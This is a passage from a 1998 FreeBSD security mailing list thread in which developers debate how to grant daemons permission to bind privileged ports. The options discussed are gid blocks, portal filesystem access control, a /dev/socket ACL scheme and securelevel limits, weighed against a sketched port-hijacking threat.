Jul 1998 01:26:21 -0400 In-Reply-To: Darren Reed "Re: bsd securelevel patch question" (Jul 1, 11:34pm) References: <01IYVQYVEO5E00BUWA@AESOP.RUTGERS.EDU> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Darren Reed Subject: Re: bsd securelevel patch question Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 1, 11:34pm, Darren Reed (possibly) wrote: > well, I dug it up, and it's not really pretty, but it does prove it is > possible. the way I set it up to work was to read in the directory > structure prior to mount_portal taking it over and then use the file > perms in that for access control. > > this was just an experiment. > > a better way to do it is to have a separate configuration file for the > perms. so that you can edit those whilst mount_portal is still running. > I thought I'd had a go at that, but I don't see the code anywhere just > now so I'll assume it's not going to be easily found. > > http://coombs.anu.edu.au/~avalon/mount_portal.tgz I don't have any way of getting to that currently; could you put that on an ftp-accessible spot? There's no link to that from the http://coombs.anu.edu.au/~avalon/ page. Does this require that programs access these ports via the portal filesystem itself, or is it simply determining permissions this way? If the former, then that's going to cause the same sort of problems with porting - including porting security-critical applications - that I was mentioning earlier. If the latter, that makes it more interesting... although probably still requiring some alterations to the group permissions system to make it work right with setuid programs, as I was pointing out previously. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 00:08:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA18702 for freebsd-security-outgoing; Thu, 2 Jul 1998 00:08:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA18670 for ; Thu, 2 Jul 1998 00:08:30 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id DAA22222; Thu, 2 Jul 1998 03:06:50 -0400 (EDT) From: "Allen Smith" Message-Id: <9807020306.ZM22221@beatrice.rutgers.edu> Date: Thu, 2 Jul 1998 03:06:49 -0400 In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jul 1, 12:44am) References: <199807010744.AAA01700@implode.root.com> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: dg@root.com Subject: Re: bsd securelevel patch question Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 1, 12:44am, David Greenman (possibly) wrote: > I'll resist any scheme that ties specific privileges to specific gids. To > me it seems too kludgy and I also suspect that most FreeBSD admins will be > quite unhappy about us hijacking a large block of gids for our special > purposes. Umm... OK, you're the boss. The block of gids I'd had in mind was above 65535, so I have my doubts how many people would be using those. Any ideas on alternate routes for port permission broadening? I haven't been able to look at Darren's version so far. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 01:55:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA10121 for freebsd-security-outgoing; Thu, 2 Jul 1998 01:55:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA10103 for ; Thu, 2 Jul 1998 01:55:54 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id BAA23399; Thu, 2 Jul 1998 01:55:24 -0700 (PDT) Message-Id: <199807020855.BAA23399@implode.root.com> To: "Allen Smith" cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Subject: Re: bsd securelevel patch question In-reply-to: Your message of "Thu, 02 Jul 1998 03:06:49 EDT." <9807020306.ZM22221@beatrice.rutgers.edu> From: David Greenman Reply-To: dg@root.com Date: Thu, 02 Jul 1998 01:55:23 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >On Jul 1, 12:44am, David Greenman (possibly) wrote: > >> I'll resist any scheme that ties specific privileges to specific gids. To >> me it seems too kludgy and I also suspect that most FreeBSD admins will be >> quite unhappy about us hijacking a large block of gids for our special >> purposes. > >Umm... OK, you're the boss. The block of gids I'd had in mind was >above 65535, so I have my doubts how many people would be using >those. Any ideas on alternate routes for port permission broadening? I >haven't been able to look at Darren's version so far. Well, someone will have to convince me that delegating access on a port by port basis is necessary in the first place. I'd personally be happy with a simple privilege that allows binding to ports <1024. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 02:56:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA17552 for freebsd-security-outgoing; Thu, 2 Jul 1998 02:56:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA17533 for ; Thu, 2 Jul 1998 02:56:08 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id FAA01571; Thu, 2 Jul 1998 05:54:16 -0400 (EDT) From: "Allen Smith" Message-Id: <9807020554.ZM1570@beatrice.rutgers.edu> Date: Thu, 2 Jul 1998 05:54:16 -0400 In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jul 2, 1:55am) References: <199807020855.BAA23399@implode.root.com> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: dg@root.com Subject: Re: bsd securelevel patch question Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 1:55am, David Greenman (possibly) wrote: > Well, someone will have to convince me that delegating access on a port > by port basis is necessary in the first place. I'd personally be happy with > a simple privilege that allows binding to ports <1024. Daemon spoofing. Let's say I've set up a web server that binds to port I want to reduce the risks from this, so I (under your scheme) give the server a privilege that enables it to bind (I'm assuming binding for reception of incoming stuff only, given rsh et al) to any TCP port below 1024. Cracker notices that I've made a goof in writing a cgi script (or the author of the webserver has goofed), and proceeds to crack it such that he can run any arbitrary program under that uid, with that privilege (this will be the case if it's run as a uid instead of setuid). Now, run a program via cron on a very frequent basis that tries binding to the smtp, ssh, or other significant port not run through inetd. This enables mail interception for smtp, password interception for ssh, etcetera. With the exception of a syslog'd error message from the smtp program, this won't be spotted in that case if the cracker then uses sendmail's -bs flag, or the equivalent for other mail programs. Ssh is admittedly going to get spotted pretty soon, but one interception of the root password (or an interception of a password a person uses across systems) is going to be enough to create problems. There are probably other vulnerabilities that I haven't thought of; going off of the least privilege principle seems the best. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 03:38:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA25029 for freebsd-security-outgoing; Thu, 2 Jul 1998 03:38:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from eltex.ru ([195.19.204.46]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA25010 for ; Thu, 2 Jul 1998 03:38:48 -0700 (PDT) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: from paranoid.eltex.spb.ru (border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with ESMTP id OAA14495; Thu, 2 Jul 1998 14:31:34 +0400 (MSD) (envelope-from ark@eltex.ru) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id OAA05835; Thu, 2 Jul 1998 14:31:43 GMT Date: Thu, 2 Jul 1998 14:31:43 GMT Message-Id: <199807021431.OAA05835@paranoid.eltex.spb.ru> Organization: "Klingon Imperial Intelligence Service" Subject: Re: bsd securelevel patch question To: easmith@beatrice.rutgers.edu Cc: avalon@coombs.anu.edu.au, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Is there anything like that without involving portalfs, say, working on per-user basis? ;) _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNZuZzaH/mIJW9LeBAQFa4QP+In909poImTNrNXlORwMnrY/O4VmxPMzM 1j6HeFFfAzKDqCjgyfTq9im+5Ns5WLcNzJmw3bWVk7inqjEygZhML+NENBOMNgWp MXzWH7jDR6SDebq+oMvjoy0SufyjhEpKGsG0jpdh82oUTbMVlkhIcsaWPlOUqwNF vDzwsUdQw1I= =FV+U -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 05:05:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA08234 for freebsd-security-outgoing; Thu, 2 Jul 1998 05:05:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA08205 for ; Thu, 2 Jul 1998 05:04:59 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199807021204.FAA08205@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA252921066; Thu, 2 Jul 1998 22:04:26 +1000 From: Darren Reed Subject: Re: bsd securelevel patch question To: easmith@beatrice.rutgers.edu (Allen Smith) Date: Thu, 2 Jul 1998 22:04:26 +1000 (EST) Cc: avalon@coombs.anu.edu.au, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com In-Reply-To: <9807020126.ZM19413@beatrice.rutgers.edu> from "Allen Smith" at Jul 2, 98 01:26:21 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Allen Smith, sie said: > > I don't have any way of getting to that currently; could you put that > on an ftp-accessible spot? There's no link to that from the > http://coombs.anu.edu.au/~avalon/ page. ftp://coombs.anu.edu.au/pub/net/misc/mount_portal.tgz > Does this require that programs access these ports via the portal > filesystem itself, or is it simply determining permissions this way? It requires them to use portals. > If the former, then that's going to cause the same sort of problems > with porting - including porting security-critical applications - that > I was mentioning earlier. If the latter, that makes it more > interesting... although probably still requiring some alterations to > the group permissions system to make it work right with setuid > programs, as I was pointing out previously. Well, if C code compiled calls a socket(2) stub in libc, then that or the bind or connect could be written to transparently use portals. Otherwise you need to convert your socket/bind's into an open. If one was using a more advanced API for sockets than the system calls which did it all in one call, you'd just rewrite that part of the library. In that implementation of addings access control to portals, there's too much fiddly work involved in making it work. A separate file or other statements in portal.conf could just as easily (and perhaps better) control access. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 07:05:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA26318 for freebsd-security-outgoing; Thu, 2 Jul 1998 07:05:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (root@ts01-55.waterford.indigo.ie [194.125.139.118]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA26254 for ; Thu, 2 Jul 1998 07:05:14 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id OAA00656; Thu, 2 Jul 1998 14:31:18 +0100 (IST) (envelope-from rotel@ginseng.indigo.ie) From: Niall Smart Message-Id: <199807021331.OAA00656@indigo.ie> Date: Thu, 2 Jul 1998 14:31:18 +0000 In-Reply-To: "Allen Smith" "Re: bsd securelevel patch question" (Jul 2, 5:54am) Reply-To: rotel@indigo.ie X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: "Allen Smith" , dg@root.com Subject: Re: bsd securelevel patch question Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 5:54am, "Allen Smith" wrote: } Subject: Re: bsd securelevel patch question > On Jul 2, 1:55am, David Greenman (possibly) wrote: > > Well, someone will have to convince me that delegating access on a port > > by port basis is necessary in the first place. I'd personally be happy with > > a simple privilege that allows binding to ports <1024. > > instead of setuid). Now, run a program via cron on a very frequent > basis that tries binding to the smtp, ssh, or other significant port > not run through inetd. This enables mail interception for smtp, > password interception for ssh, etcetera. With the exception of a Eh? If ssh/smtp/inetd bind to the port you won't be able to, no matter how often you try. And you won't be able to steal keys by hijacking sshd. I still agree with you for other reasons though, if an attacker creates a new service people might use it even though it isn't a legitimate service setup my the sysadmin. Whats wrong with a /dev/socket/tcp/XYZ acl type scheme? If the process has permission to read /dev/socket/tcp/83 then they can bind to port 83, you could make it a procfs type filesystem so all the ACL information was in memory for speed. Then you've got to save/restore state though. Niall -- Niall Smart. PGP: finger njs3@motmot.doc.ic.ac.uk FreeBSD: Turning PC's into Workstations: www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 07:11:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA27600 for freebsd-security-outgoing; Thu, 2 Jul 1998 07:11:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA27562 for ; Thu, 2 Jul 1998 07:11:17 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id HAA24585; Thu, 2 Jul 1998 07:10:20 -0700 (PDT) Message-Id: <199807021410.HAA24585@implode.root.com> To: rotel@indigo.ie cc: "Allen Smith" , security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Subject: Re: bsd securelevel patch question In-reply-to: Your message of "Thu, 02 Jul 1998 14:31:18 -0000." <199807021331.OAA00656@indigo.ie> From: David Greenman Reply-To: dg@root.com Date: Thu, 02 Jul 1998 07:10:20 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Eh? If ssh/smtp/inetd bind to the port you won't be able to, no >matter how often you try. And you won't be able to steal keys >by hijacking sshd. > >I still agree with you for other reasons though, if an attacker >creates a new service people might use it even though it isn't a >legitimate service setup my the sysadmin. > >Whats wrong with a /dev/socket/tcp/XYZ acl type scheme? If the >process has permission to read /dev/socket/tcp/83 then they can >bind to port 83, you could make it a procfs type filesystem so all >the ACL information was in memory for speed. Then you've got to >save/restore state though. Well, one thing that is wrong with this is that it is slow. I sure wouldn't want my busy WWW server doing this for every connection that is made. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 08:31:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA10012 for freebsd-security-outgoing; Thu, 2 Jul 1998 08:31:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (nsmart@ts01-55.waterford.indigo.ie [194.125.139.118]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA09957 for ; Thu, 2 Jul 1998 08:31:27 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id QAA02205; Thu, 2 Jul 1998 16:26:17 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199807021526.QAA02205@indigo.ie> Date: Thu, 2 Jul 1998 16:26:16 +0000 In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jul 2, 7:10am) Reply-To: rotel@indigo.ie X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: dg@root.com, rotel@indigo.ie Subject: Re: bsd securelevel patch question Cc: "Allen Smith" , security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 7:10am, David Greenman wrote: } Subject: Re: bsd securelevel patch question > > Well, one thing that is wrong with this is that it is slow. I sure wouldn't > want my busy WWW server doing this for every connection that is made. It would only be necessary to do this for binds to ports < 1024. So it would just be checked every time a daemon started. Niall -- Niall Smart. PGP: finger njs3@motmot.doc.ic.ac.uk FreeBSD: Turning PC's into Workstations: www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 08:38:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA11764 for freebsd-security-outgoing; Thu, 2 Jul 1998 08:38:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk (critter.freebsd.dk [195.8.133.1] (may be forged)) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA11671 for ; Thu, 2 Jul 1998 08:38:30 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.8.7/8.8.5) with ESMTP id RAA02602; Thu, 2 Jul 1998 17:35:48 +0200 (CEST) To: rotel@indigo.ie cc: "Allen Smith" , dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Subject: Re: bsd securelevel patch question In-reply-to: Your message of "Thu, 02 Jul 1998 14:31:18 -0000." <199807021331.OAA00656@indigo.ie> Date: Thu, 02 Jul 1998 17:35:48 +0200 Message-ID: <2600.899393748@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Eh? If ssh/smtp/inetd bind to the port you won't be able to, no >matter how often you try. And you won't be able to steal keys >by hijacking sshd. correct. >I still agree with you for other reasons though, if an attacker >creates a new service people might use it even though it isn't a >legitimate service setup my the sysadmin. Right, but if the attacker has hacked your system enough to bind to a socket < 1024, he >OWNS< it. Any further attempt at adding security is bogus, and can at best OPEN the window more because you will be adding more complexity, rather than subtract from it. The one fix that gives you most mileage is to add kernel code such that above some particular securelevel, you cannot open sockets < 1024 anymore. The downside is you have to reboot to restart deamons and the R* family stops working... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." "ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 09:02:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA17590 for freebsd-security-outgoing; Thu, 2 Jul 1998 09:02:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA17409 for ; Thu, 2 Jul 1998 09:01:56 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id JAA24882; Thu, 2 Jul 1998 09:00:56 -0700 (PDT) Message-Id: <199807021600.JAA24882@implode.root.com> To: rotel@indigo.ie cc: "Allen Smith" , security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Subject: Re: bsd securelevel patch question In-reply-to: Your message of "Thu, 02 Jul 1998 16:26:16 -0000." <199807021526.QAA02205@indigo.ie> From: David Greenman Reply-To: dg@root.com Date: Thu, 02 Jul 1998 09:00:56 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >On Jul 2, 7:10am, David Greenman wrote: >} Subject: Re: bsd securelevel patch question >> >> Well, one thing that is wrong with this is that it is slow. I sure wouldn't >> want my busy WWW server doing this for every connection that is made. > >It would only be necessary to do this for binds to ports < 1024. So it >would just be checked every time a daemon started. Um, well, let's talk about FTP servers, then, since those do a privileged bind() for every data connection that is estabilished (one per file transfer). -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 09:05:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA18240 for freebsd-security-outgoing; Thu, 2 Jul 1998 09:05:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (nsmart@ts01-55.waterford.indigo.ie [194.125.139.118]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA18214 for ; Thu, 2 Jul 1998 09:05:08 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id QAA00294; Thu, 2 Jul 1998 16:56:14 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199807021556.QAA00294@indigo.ie> Date: Thu, 2 Jul 1998 16:56:14 +0000 In-Reply-To: Poul-Henning Kamp "Re: bsd securelevel patch question" (Jul 2, 5:35pm) Reply-To: rotel@indigo.ie X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Poul-Henning Kamp , rotel@indigo.ie Subject: Re: bsd securelevel patch question Cc: "Allen Smith" , dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 5:35pm, Poul-Henning Kamp wrote: } Subject: Re: bsd securelevel patch question > > >I still agree with you for other reasons though, if an attacker > >creates a new service people might use it even though it isn't a > >legitimate service setup my the sysadmin. > > Right, but if the attacker has hacked your system enough to bind > to a socket < 1024, he >OWNS< it. Any further attempt at adding > security is bogus, and can at best OPEN the window more because > you will be adding more complexity, rather than subtract from it. Thats not true, if he hacks the user/group that the web server runs at then he only owns the web server, the only additional priviledge he gains is the ability to bind to port 80. Niall -- Niall Smart. PGP: finger njs3@motmot.doc.ic.ac.uk FreeBSD: Turning PC's into Workstations: www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 09:23:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA21998 for freebsd-security-outgoing; Thu, 2 Jul 1998 09:23:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (aniwa.actrix.gen.nz [203.96.56.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA21982 for ; Thu, 2 Jul 1998 09:23:06 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from [192.168.1.2] (mac.sky [192.168.1.2]) by aniwa.sky (8.8.7/8.8.7) with SMTP id EAA07119 for ; Fri, 3 Jul 1998 04:22:46 +1200 (NZST) (envelope-from andrew@squiz.co.nz) X-Sender: andrew@192.168.1.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 3 Jul 1998 04:26:00 +1200 To: security@FreeBSD.ORG From: andrew@squiz.co.nz (Andrew McNaughton) Subject: Re: bsd securelevel patch question Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Eh? If ssh/smtp/inetd bind to the port you won't be able to, no >matter how often you try. Unless the server is restarted for some reason. hence the rapid cron job which will eventually succeed if not detected first. >And you won't be able to steal keys >by hijacking sshd. If the trojan gets to tell the other end what public key to use, then of course it can get at the data stream. This is equally true with routing/man-in-the-middle attacks. Without access to master.passwd though it can't do a very good job of masquerading as an authentication agent. It will fail to emulate any authentication unless that can be done by accepting any connection regardless. I don't know enough about the authentication systems ssh uses to know which if any are vulnerable here. >I still agree with you for other reasons though, if an attacker >creates a new service people might use it even though it isn't a >legitimate service setup my the sysadmin. > >Whats wrong with a /dev/socket/tcp/XYZ acl type scheme? If the >process has permission to read /dev/socket/tcp/83 then they can >bind to port 83, you could make it a procfs type filesystem so all >the ACL information was in memory for speed. Then you've got to >save/restore state though. > >Niall I don't know enough about TCP/IP details to know if this makes sense, but perhaps you could use these as more than just flags and allow programmers to bind to the socket by just opening the appropriate device file. ie #!/usr/local/bin/perl open (SMTP, " Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA22372 for freebsd-security-outgoing; Thu, 2 Jul 1998 09:25:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA22356 for ; Thu, 2 Jul 1998 09:25:03 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id SAA24957; Thu, 2 Jul 1998 18:24:26 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) X-Authentication-Warning: mail.ftf.dk: Host [192.168.100.254] claimed to be mail.prosa.dk Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id SAA08055; Thu, 2 Jul 1998 18:24:04 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id SAA11133; Thu, 2 Jul 1998 18:24:01 +0200 (CEST) Message-ID: <19980702182400.33083@deepo.prosa.dk> Date: Thu, 2 Jul 1998 18:24:00 +0200 From: Philippe Regnauld To: dg@root.com Cc: security@FreeBSD.ORG Subject: Re: bsd securelevel patch question References: <199807021331.OAA00656@indigo.ie> <199807021410.HAA24585@implode.root.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: <199807021410.HAA24585@implode.root.com>; from David Greenman on Thu, Jul 02, 1998 at 07:10:20AM -0700 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Greenman writes: > > > >Whats wrong with a /dev/socket/tcp/XYZ acl type scheme? If the > >process has permission to read /dev/socket/tcp/83 then they can > >bind to port 83, you could make it a procfs type filesystem so all > > Well, one thing that is wrong with this is that it is slow. I sure wouldn't > want my busy WWW server doing this for every connection that is made. Wouldn't the parent apache (or other) bind to 80 and listen there once and for all at startup time ? -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 10:07:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA28161 for freebsd-security-outgoing; Thu, 2 Jul 1998 10:07:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk (critter.freebsd.dk [195.8.133.1] (may be forged)) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA28126 for ; Thu, 2 Jul 1998 10:07:26 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.8.7/8.8.5) with ESMTP id TAA02757; Thu, 2 Jul 1998 19:04:48 +0200 (CEST) To: rotel@indigo.ie cc: "Allen Smith" , dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, 